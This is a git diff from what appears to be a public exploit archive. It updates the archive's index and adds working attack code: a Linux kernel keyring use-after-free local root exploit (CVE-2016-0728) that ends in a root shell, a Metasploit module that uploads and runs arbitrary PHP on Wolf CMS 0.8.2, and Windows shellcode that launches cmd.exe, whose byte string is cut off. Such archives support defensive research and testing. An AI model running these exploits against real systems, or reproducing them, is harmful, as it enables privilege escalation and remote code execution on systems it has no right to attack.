1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80 @@ -36143,7 +36144,7 @@ id,file,description,date,author,platform,type,port 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80 39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 - 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80 -39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (msf)",2016-06-15,"Markus Wulftange",linux,remote,443 +39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0 @@ -36161,12 +36162,12 @@ id,file,description,date,author,platform,type,port 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 39979,platforms/windows/shellcode/39979.c,"Windows XP - 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0 -39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf)",2016-06-20,s0nk3y,windows,local,0 +39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0 39981,platforms/php/webapps/39981.html,"Airia - (Add Content) CSRF",2016-06-20,HaHwul,php,webapps,80 39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 -39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (msf)",2016-06-21,"Jos Wetzels",windows,remote,1604 +39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80 @@ -36180,3 +36181,6 @@ id,file,description,date,author,platform,type,port 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80 +39999,platforms/win64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win64,remote,21 +40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80 +40005,platforms/win32/shellcode/40005.c,"Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode",2016-06-22,"Roziul Hasan Khan Shifat",win32,shellcode,0 diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c index bcee599b4..1e3e01f7a 100755 --- a/platforms/linux/local/39277.c +++ b/platforms/linux/local/39277.c @@ -5,12 +5,10 @@ # CVE : CVE-2016-0728 */ -/* CVE-2016-0728 local root exploit - modified by Federico Bento to read kernel symbols from /proc/kallsyms - props to grsecurity/PaX for preventing this in so many ways +/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ +/* $ ./cve_2016_072 PP_KEY */ - $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall - $ ./cve_2016_072 PP_KEY */ +/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */ #include #include @@ -30,183 +28,143 @@ _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; #define STRUCT_LEN (0xb8 - 0x30) -#define COMMIT_CREDS_ADDR (0xffffffff810bb050) -#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) +#define COMMIT_CREDS_ADDR (0xffffffff81094250) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550) struct key_type { char * name; - size_t datalen; - void * vet_description; - void * preparse; - void * free_preparse; - void * instantiate; - void * update; - void * match_preparse; - void * match_free; - void * revoke; - void * destroy; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; }; -/* thanks spender - Federico Bento */ -static unsigned long get_kernel_sym(char *name) -{ - FILE *f; - unsigned long addr; - char dummy; - char sname[256]; - int ret; - - f = fopen("/proc/kallsyms", "r"); - if (f == NULL) { - fprintf(stdout, "Unable to obtain symbol listing!\n"); - exit(0); - } - - ret = 0; - while(ret != EOF) { - ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); - if (ret == 0) { - fscanf(f, "%s\n", sname); - continue; - } - if (!strcmp(name, sname)) { - fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); - fclose(f); - return addr; - } - } - - fclose(f); - return 0; -} - void userspace_revoke(void * key) { - commit_creds(prepare_kernel_cred(0)); + commit_creds(prepare_kernel_cred(0)); } int main(int argc, const char *argv[]) { - const char *keyring_name; - size_t i = 0; - unsigned long int l = 0x100000000/2; - key_serial_t serial = -1; - pid_t pid = -1; - struct key_type * my_key_type = NULL; + const char *keyring_name; + size_t i = 0; + unsigned long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + +struct { long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; - struct { - long mtype; - char mtext[STRUCT_LEN]; - } msg = {0x4141414141414141, {0}}; - int msqid; + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } - if (argc != 2) { - puts("usage: ./keys "); - return 1; + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds) COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR; + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); } - printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); - commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); - prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); - if(commit_creds == NULL || prepare_kernel_cred == NULL) { - commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; - prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; - if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) - puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("keyctl"); + return -1; + } } - my_key_type = malloc(sizeof(*my_key_type)); + puts("finished increfing"); + puts("forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("fork"); + return -1; + } - my_key_type->revoke = (void*)userspace_revoke; - memset(msg.mtext, 'A', sizeof(msg.mtext)); - - // key->uid - *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ - //key->perm - *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; - - //key->type - *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; - - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("msgget"); + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("msgsnd"); + exit(1); + } + } + sleep(-1); exit(1); } + } + + puts("finished forking"); + sleep(5); - keyring_name = argv[1]; - - /* Set the new session keyring before we start */ - - serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); - if (serial < 0) { - perror("keyctl"); - return -1; - } - - if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { - perror("keyctl"); - return -1; + /* call userspace_revoke from kernel */ + puts("caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("keyctl_revoke"); } + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); - puts("[+] Increfing..."); - for (i = 1; i < 0xfffffffd; i++) { - if (i == (0xffffffff - l)) { - l = l/2; - sleep(5); - } - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - perror("[-] keyctl"); - return -1; - } - } - sleep(5); - /* here we are going to leak the last references to overflow */ - for (i=0; i<5; ++i) { - if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { - perror("[-] keyctl"); - return -1; - } - } - - puts("[+] Finished increfing"); - puts("[+] Forking..."); - /* allocate msg struct in the kernel rewriting the freed keyring object */ - for (i=0; i<64; i++) { - pid = fork(); - if (pid == -1) { - perror("[-] fork"); - return -1; - } - - if (pid == 0) { - sleep(2); - if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { - perror("[-] msgget"); - exit(1); - } - for (i = 0; i < 64; i++) { - if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { - perror("[-] msgsnd"); - exit(1); - } - } - sleep(-1); - exit(1); - } - } - - puts("[+] Finished forking"); - sleep(5); - - /* call userspace_revoke from kernel */ - puts("[+] Caling revoke..."); - if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { - perror("[+] keyctl_revoke"); - } - - printf("uid=%d, euid=%d\n", getuid(), geteuid()); - execl("/bin/sh", "/bin/sh", NULL); - - return 0; + return 0; } \ No newline at end of file diff --git a/platforms/linux/local/40003.c b/platforms/linux/local/40003.c new file mode 100755 index 000000000..bcee599b4 --- /dev/null +++ b/platforms/linux/local/40003.c @@ -0,0 +1,212 @@ +/* +# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings +# Date: 19/1/2016 +# Exploit Author: Perception Point Team +# CVE : CVE-2016-0728 +*/ + +/* CVE-2016-0728 local root exploit + modified by Federico Bento to read kernel symbols from /proc/kallsyms + props to grsecurity/PaX for preventing this in so many ways + + $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall + $ ./cve_2016_072 PP_KEY */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); +_commit_creds commit_creds; +_prepare_kernel_cred prepare_kernel_cred; + +#define STRUCT_LEN (0xb8 - 0x30) +#define COMMIT_CREDS_ADDR (0xffffffff810bb050) +#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) + + + +struct key_type { + char * name; + size_t datalen; + void * vet_description; + void * preparse; + void * free_preparse; + void * instantiate; + void * update; + void * match_preparse; + void * match_free; + void * revoke; + void * destroy; +}; + +/* thanks spender - Federico Bento */ +static unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + fprintf(stdout, "Unable to obtain symbol listing!\n"); + exit(0); + } + + ret = 0; + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fprintf(stdout, "[+] Resolved %s to %p\n", name, (void *)addr); + fclose(f); + return addr; + } + } + + fclose(f); + return 0; +} + +void userspace_revoke(void * key) { + commit_creds(prepare_kernel_cred(0)); +} + +int main(int argc, const char *argv[]) { + const char *keyring_name; + size_t i = 0; + unsigned long int l = 0x100000000/2; + key_serial_t serial = -1; + pid_t pid = -1; + struct key_type * my_key_type = NULL; + + struct { + long mtype; + char mtext[STRUCT_LEN]; + } msg = {0x4141414141414141, {0}}; + int msqid; + + if (argc != 2) { + puts("usage: ./keys "); + return 1; + } + + printf("[+] uid=%d, euid=%d\n", getuid(), geteuid()); + commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); + prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); + if(commit_creds == NULL || prepare_kernel_cred == NULL) { + commit_creds = (_commit_creds)COMMIT_CREDS_ADDR; + prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; + if(commit_creds == (_commit_creds)0xffffffff810bb050 || prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) + puts("[-] You probably need to change the address of commit_creds and prepare_kernel_cred in source"); + } + + my_key_type = malloc(sizeof(*my_key_type)); + + my_key_type->revoke = (void*)userspace_revoke; + memset(msg.mtext, 'A', sizeof(msg.mtext)); + + // key->uid + *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ + //key->perm + *(int*)(&msg.mtext[64]) = 0x3f3f3f3f; + + //key->type + *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; + + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + exit(1); + } + + keyring_name = argv[1]; + + /* Set the new session keyring before we start */ + + serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); + if (serial < 0) { + perror("keyctl"); + return -1; + } + + if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) { + perror("keyctl"); + return -1; + } + + + puts("[+] Increfing..."); + for (i = 1; i < 0xfffffffd; i++) { + if (i == (0xffffffff - l)) { + l = l/2; + sleep(5); + } + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("[-] keyctl"); + return -1; + } + } + sleep(5); + /* here we are going to leak the last references to overflow */ + for (i=0; i<5; ++i) { + if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { + perror("[-] keyctl"); + return -1; + } + } + + puts("[+] Finished increfing"); + puts("[+] Forking..."); + /* allocate msg struct in the kernel rewriting the freed keyring object */ + for (i=0; i<64; i++) { + pid = fork(); + if (pid == -1) { + perror("[-] fork"); + return -1; + } + + if (pid == 0) { + sleep(2); + if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("[-] msgget"); + exit(1); + } + for (i = 0; i < 64; i++) { + if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { + perror("[-] msgsnd"); + exit(1); + } + } + sleep(-1); + exit(1); + } + } + + puts("[+] Finished forking"); + sleep(5); + + /* call userspace_revoke from kernel */ + puts("[+] Caling revoke..."); + if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { + perror("[+] keyctl_revoke"); + } + + printf("uid=%d, euid=%d\n", getuid(), geteuid()); + execl("/bin/sh", "/bin/sh", NULL); + + return 0; +} \ No newline at end of file diff --git a/platforms/php/remote/40004.rb b/platforms/php/remote/40004.rb new file mode 100755 index 000000000..c437b6ee3 --- /dev/null +++ b/platforms/php/remote/40004.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Wolfcms 0.8.2 Arbitrary PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in Wolfcms + version 0.8.2. This application has an upload feature that + allows an authenticated user with administrator roles to upload + arbitrary files to the '/public' directory. + }, + 'Author' => [ + 'Narendra Bhati', # Proof of concept + 'Rahmat Nurfauzi' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-6568'], + ['CVE', '2015-6567'], + ['OSVDB','126852'], + ['EDB', '38000'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Wolfcms <= 0.8.2', {}] + ], + 'DisclosureDate' => 'Aug 28 2015', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to wolfcms', '/wolfcms']), + OptString.new('USER', [true, 'User to login with', '']), + OptString.new('PASS', [true, 'Password to login with', '']), + ], self.class) + end + + def login + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, "/?/admin/login/login/"), + 'vars_post' => { + "login[username]" => datastore['USER'], + "login[password]" => datastore['PASS'], + "login[redirect]" => "/wolfcms/?/admin" + } + }) + return res + end + + def exploit + + upload_name = rand_text_alpha(5 + rand(5)) + '.php' + + get_cookie = login.get_cookies + cookie = get_cookie.split(";")[3] + + token = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/browse/") + }) + + html = token.body + if html =~ /Files/ + print_status("Login successfuly") + end + csrf_token = html.scan(/ 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + boundary, + 'Cookie' => cookie, + }, + 'uri' => normalize_uri(target_uri, "/?/admin/plugin/file_manager/upload/") + }) + + register_file_for_cleanup(upload_name) + + print_status("#{peer} - Executing shell...") + + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "public",upload_name), + }) + + end +end \ No newline at end of file diff --git a/platforms/win32/shellcode/40005.c b/platforms/win32/shellcode/40005.c new file mode 100755 index 000000000..0779cd475 --- /dev/null +++ b/platforms/win32/shellcode/40005.c @@ -0,0 +1,273 @@ +/* + + # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode + # Date : 22-06-2016 + # Author : Roziul Hasan Khan Shifat + # Tested on : Windows 7,10 x86 + +*/ + + +/* + +section .text + global _start +_start: +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;EAX=PEB +mov eax,[eax+0xc] ;EAX=PEB->Ldr +mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList +lodsd ; EAX=ntdll.dll +xchg eax,esi ;EAX=ESI , ESI=EAX +lodsd ; EAX=Third(kernel32) +mov ebx,[eax+0x10] ;PVOID Dllbase (base address) + +;------------------------------- + +mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew +add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header +mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress +add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY) +mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames +add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames +xor ecx,ecx +;----------------------- + +Get_func: +inc ecx ;increment the ordinal +lodsd ;Get name offset +add eax,ebx ;(offset+kernel32.dll base adress)=Get function name +cmp dword [eax],0x50746547 ;GetP +jnz Get_func +cmp dword [eax+0x4],0x41636f72 ;rocA +jnz Get_func +cmp dword [eax+0x8],0x65726464 ;ddre +jnz Get_func + +;--------------------- + +mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals + +add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll + +mov cx,[esi+ecx*2] ;CX=Number of Function +dec ecx +mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions + +add esi,ebx ;ESI=beginning of Address table +mov edx,[esi+ecx*4];EDX=Pointer(offset) +add edx,ebx ;Edx=GetProcAddress + +;----------------------------- +xor esi,esi +mov esi,edx ;backup of GetProcAddress +xor edi,edi +mov edi,ebx +;-------------- + +;finding address of LoadLibraryA() +xor ecx,ecx +push ecx + +push 0x41797261 +push 0x7262694c +push 0x64616f4c + +push esp +push ebx ;address of kernel32.dll + +call edx + +add esp,12 +;----------------- +xor ecx,ecx +;finding address of ExitProcess +push 0x42737365 +mov [esp+3],cl +push 0x636f7250 +push 0x74697845 +push esp +push edi +xor edi,edi +mov edi,eax +call esi + +;---------------------------- +add esp,12 +;LoadLibraryA("shell32.dll") +xor ecx,ecx +push ecx +push 0x416c6c64 +mov [esp+3],cl +push 0x2e32336c +push 0x6c656873 + +push esp +xor edx,edx +mov edx,edi ;Edx=LoadLibraryA +mov edi,eax ;edi=ExitProcess +call edx +add esp,11 +;------------------ + +;finding address of ShellExecuteA() +xor ecx,ecx +push 0x42424241 +mov [esp+1],cl + +push 0x65747563 +push 0x6578456c +push 0x6c656853 + +push esp +push eax + +call esi +;------------------- +;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); +add esp,13 +xor ecx,ecx +push 0x41657865 +mov [esp+3],cl +push 0x2e646d63 + +push esp +pop ecx + + +xor edx,edx +inc edx + +push edx +xor edx,edx +push edx +push edx + +push ecx +push edx +push edx + +call eax + +call edi + +*/ + + +/* + +Disassembly of section .text: + +00401000 <_start>: + 401000: 31 c9 xor %ecx,%ecx + 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax + 401006: 8b 40 0c mov 0xc(%eax),%eax + 401009: 8b 70 14 mov 0x14(%eax),%esi + 40100c: ad lods %ds:(%esi),%eax + 40100d: 96 xchg %eax,%esi + 40100e: ad lods %ds:(%esi),%eax + 40100f: 8b 58 10 mov 0x10(%eax),%ebx + 401012: 8b 53 3c mov 0x3c(%ebx),%edx + 401015: 01 da add %ebx,%edx + 401017: 8b 52 78 mov 0x78(%edx),%edx + 40101a: 01 da add %ebx,%edx + 40101c: 8b 72 20 mov 0x20(%edx),%esi + 40101f: 01 de add %ebx,%esi + 401021: 31 c9 xor %ecx,%ecx + +00401023 : + 401023: 41 inc %ecx + 401024: ad lods %ds:(%esi),%eax + 401025: 01 d8 add %ebx,%eax + 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) + 40102d: 75 f4 jne 401023 + 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) + 401036: 75 eb jne 401023 + 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) + 40103f: 75 e2 jne 401023 + 401041: 8b 72 24 mov 0x24(%edx),%esi + 401044: 01 de add %ebx,%esi + 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx + 40104a: 49 dec %ecx + 40104b: 8b 72 1c mov 0x1c(%edx),%esi + 40104e: 01 de add %ebx,%esi + 401050: 8b 14 8e mov (%esi,%ecx,4),%edx + 401053: 01 da add %ebx,%edx + 401055: 31 f6 xor %esi,%esi + 401057: 89 d6 mov %edx,%esi + 401059: 31 ff xor %edi,%edi + 40105b: 89 df mov %ebx,%edi + 40105d: 31 c9 xor %ecx,%ecx + 40105f: 51 push %ecx + 401060: 68 61 72 79 41 push $0x41797261 + 401065: 68 4c 69 62 72 push $0x7262694c + 40106a: 68 4c 6f 61 64 push $0x64616f4c + 40106f: 54 push %esp + 401070: 53 push %ebx + 401071: ff d2 call *%edx + 401073: 83 c4 0c add $0xc,%esp + 401076: 31 c9 xor %ecx,%ecx + 401078: 68 65 73 73 42 push $0x42737365 + 40107d: 88 4c 24 03 mov %cl,0x3(%esp) + 401081: 68 50 72 6f 63 push $0x636f7250 + 401086: 68 45 78 69 74 push $0x74697845 + 40108b: 54 push %esp + 40108c: 57 push %edi + 40108d: 31 ff xor %edi,%edi + 40108f: 89 c7 mov %eax,%edi + 401091: ff d6 call *%esi + 401093: 83 c4 0c add $0xc,%esp + 401096: 31 c9 xor %ecx,%ecx + 401098: 51 push %ecx + 401099: 68 64 6c 6c 41 push $0x416c6c64 + 40109e: 88 4c 24 03 mov %cl,0x3(%esp) + 4010a2: 68 6c 33 32 2e push $0x2e32336c + 4010a7: 68 73 68 65 6c push $0x6c656873 + 4010ac: 54 push %esp + 4010ad: 31 d2 xor %edx,%edx + 4010af: 89 fa mov %edi,%edx + 4010b1: 89 c7 mov %eax,%edi + 4010b3: ff d2 call *%edx + 4010b5: 83 c4 0b add $0xb,%esp + 4010b8: 31 c9 xor %ecx,%ecx + 4010ba: 68 41 42 42 42 push $0x42424241 + 4010bf: 88 4c 24 01 mov %cl,0x1(%esp) + 4010c3: 68 63 75 74 65 push $0x65747563 + 4010c8: 68 6c 45 78 65 push $0x6578456c + 4010cd: 68 53 68 65 6c push $0x6c656853 + 4010d2: 54 push %esp + 4010d3: 50 push %eax + 4010d4: ff d6 call *%esi + 4010d6: 83 c4 0d add $0xd,%esp + 4010d9: 31 c9 xor %ecx,%ecx + 4010db: 68 65 78 65 41 push $0x41657865 + 4010e0: 88 4c 24 03 mov %cl,0x3(%esp) + 4010e4: 68 63 6d 64 2e push $0x2e646d63 + 4010e9: 54 push %esp + 4010ea: 59 pop %ecx + 4010eb: 31 d2 xor %edx,%edx + 4010ed: 42 inc %edx + 4010ee: 52 push %edx + 4010ef: 31 d2 xor %edx,%edx + 4010f1: 52 push %edx + 4010f2: 52 push %edx + 4010f3: 51 push %ecx + 4010f4: 52 push %edx + 4010f5: 52 push %edx + 4010f6: ff d0 call *%eax + 4010f8: ff d7 call *%edi + +*/ + + +#include +#include +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\